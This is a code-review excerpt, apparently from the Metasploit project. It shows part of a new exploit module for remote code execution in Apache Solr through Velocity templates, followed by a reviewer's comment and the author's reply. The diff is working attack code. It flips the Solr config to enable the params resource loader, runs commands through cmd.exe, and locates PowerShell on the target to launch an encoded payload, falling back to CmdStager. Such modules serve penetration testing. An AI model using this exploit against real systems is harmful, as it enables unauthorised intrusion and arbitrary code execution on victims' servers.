modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,483 @@
+        'data'          => enable_params_resource_loader
+      }
+
+      unless @auth_string == ""
+        opts_post.store('authorization', @auth_string)
+      end
+
+      print_status("params.resource.loader.enabled is false, setting it to true...")
+      update_config = send_request_cgi(opts_post)
+
+      unless update_config
+        fail_with Failure::Unreachable, "Connection failed!"
+      end
+
+      # if we got anything other than a 200 back, the configuration update failed and the exploit won't work
+      unless update_config.code == 200
+        fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
+      end
+
+      print_good("params.resource.loader.enabled is now set to true!")
+    end
+
+    # windows...
+    if @target_platform.include? "Windows"
+      # if target is wrong, warn and exit before doing anything
+      unless target.name.include? "Windows"
+        fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!"
+      end
+
+      # plain old exec
+      if datastore['PAYLOAD'].include?("windows/exec") || datastore['PAYLOAD'].include?("windows/x64/exec")
+        cmd = "C:\\Windows\\System32\\cmd.exe /c #{datastore['CMD']}"
+        exec_and_output(cmd)
+        # the exploit should end here if payload is windows/exec
+        return nil
+      end
+
+      # exploiting for Windows relies heavily on PowerShell, so go find it first
+      winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true)
+      # did it connect?
+      unless winenv_path
+        fail_with Failure::Unreachable, "Connection failed!"
+      end
+
+      # did the command to check for PATH execute?
+      unless winenv_path.code == 200
+        fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!"
+      end
+
+      # is PowerShell in PATH?
+      if /powershell/i =~ winenv_path.body.to_s
+        # only interested in the contents of PATH. Everything before it is irrelevant
+        paths = winenv_path.body.split('=')[1]
+        # confirm that PowerShell exists in the PATH by checking each one
+        paths.split(';').each do |path_val|
+          # if PowerShell exists in PATH, then we are good to go
+          unless /powershell/i =~ path_val
+            next
+          end
+
+          print_good("Found Powershell at #{path_val}")
+          # generate PowerShell command, encode with base64, and remove comspec
+          psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+          # specify full path to PowerShell
+          psh_cmd.insert(0, path_val)
+          # exploit the thing
+          execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+        end
+        # no PowerShell? revert to CmdStager
```

Comment:
These should really be separate targets that can be specified by the user. It's often desirable for the operator to specify CmdStager (possibly with a custom EXE template) vs Powershell (which is often disabled).  I would definitely prefer to see these as explicit targets for the operator to select. If Powershell is unavailable and it was the target that was selected, the module should `fail_with(Failure::NoTarget, 'Powershell was not found')`.

Reply:
Changed in commit 861b79bce7d4ac408e462d2a1b19e7d72cfe82f8.